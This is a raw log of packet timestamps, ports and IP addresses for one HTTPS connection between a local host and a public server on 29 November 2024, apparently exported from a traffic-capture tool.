                                                                                                            Nov 29, 2024 09:09:29.776768923 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.776778936 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.777010918 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.777010918 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.777023077 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.777226925 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.779417038 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.779428005 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.779571056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.779702902 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.779715061 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.779897928 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.782295942 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.782305956 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.782731056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.782742977 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.783001900 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.785322905 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.785332918 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.785473108 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.785567999 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.785581112 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.785588026 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.785761118 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.787421942 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.787432909 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.787592888 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.787672043 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.787686110 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.787697077 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.787878990 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.790035009 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.790045023 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.790309906 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.790323019 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.790492058 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.792327881 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.792337894 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.792582035 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.792594910 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.792767048 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.795182943 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.795192957 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.795375109 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.795454979 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.795469046 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.795675039 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.797318935 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.797328949 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.797548056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.797560930 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.797719955 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.800060987 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.800071001 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.800265074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.800265074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.800278902 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.800338984 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.800477028 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.802658081 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.802669048 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.802851915 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.802851915 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.802907944 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.802925110 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.846120119 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.846133947 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.846472025 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851526022 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851536989 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.851541996 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.851772070 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.851784945 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851877928 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851891041 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.851941109 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851941109 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.851948023 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.851989031 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852042913 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852042913 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852119923 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852119923 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852129936 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852133989 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852145910 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852178097 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852178097 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852184057 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852188110 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852230072 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852287054 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852293015 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852324009 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852343082 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852343082 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852392912 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852392912 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852441072 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852509975 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852514029 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852514029 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852514982 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852541924 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852541924 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852560997 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852610111 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852670908 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852699995 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852704048 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852705002 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.852749109 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852749109 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852850914 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852967978 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.852967978 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853032112 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853045940 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853045940 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853140116 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853243113 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853245974 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.853250980 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.853406906 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.853477001 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853477001 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853524923 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853575945 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853629112 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.853668928 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853785038 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853820086 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.853848934 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.853966951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.854016066 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:29.854033947 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.854033947 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.854214907 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:29.854293108 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.010955095 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.010968924 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.011106014 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015223026 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015233994 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015240908 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015402079 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015403032 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015469074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015469074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015472889 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015476942 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015477896 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015477896 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015480042 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015482903 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015486956 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015536070 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015651941 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015728951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015728951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015777111 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015777111 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015821934 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015825987 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015825987 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015830040 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.015923977 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015923977 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.015928984 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016021967 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016021967 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016028881 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016071081 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016123056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016218901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016218901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016218901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016218901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016232014 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016267061 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016267061 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016366005 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016366005 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016374111 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016415119 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016463041 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016511917 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016511917 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016653061 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016657114 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016701937 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016767979 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016767979 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016874075 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016874075 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016881943 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016921043 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016968012 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.016969919 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016969919 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.016969919 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017019033 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017019033 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017118931 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017198086 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017198086 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017246008 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017246008 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017251968 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.017294884 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017343998 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017343998 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017462015 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017535925 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.017584085 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.143377066 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.143393993 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.143564939 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147177935 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147196054 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147203922 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147208929 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147368908 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147382975 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147442102 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147442102 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147452116 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147458076 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147495031 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147545099 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147619009 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147766113 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147775888 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147824049 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147916079 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147927999 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.147981882 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.147981882 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148097992 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148097992 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148145914 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148152113 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.148243904 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148243904 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148248911 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.148341894 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148341894 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148341894 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148391008 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148395061 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.148439884 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148490906 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148490906 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148588896 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148588896 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148607016 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.148638010 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148638010 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148685932 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148736954 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148736954 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148736954 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148751020 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.148839951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148839951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148886919 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148984909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.148984909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149034023 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149034023 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149132013 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149141073 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.149216890 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149216890 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149318933 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149370909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149370909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149466991 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.149570942 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.276417017 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.276447058 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.276710033 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280303001 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280334949 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280358076 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280366898 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280486107 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280487061 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280520916 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280559063 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280559063 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280603886 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280605078 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280653000 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280703068 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280703068 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280751944 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280755043 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280762911 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280801058 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280849934 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280900002 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280900002 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280900002 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280936003 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.280971050 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280971050 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.280971050 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281011105 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281060934 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281111002 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281111002 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281158924 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281183004 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.281213045 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281249046 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:30.281258106 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281258106 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:30.281302929 CET49755443192.168.11.30172.67.179.67
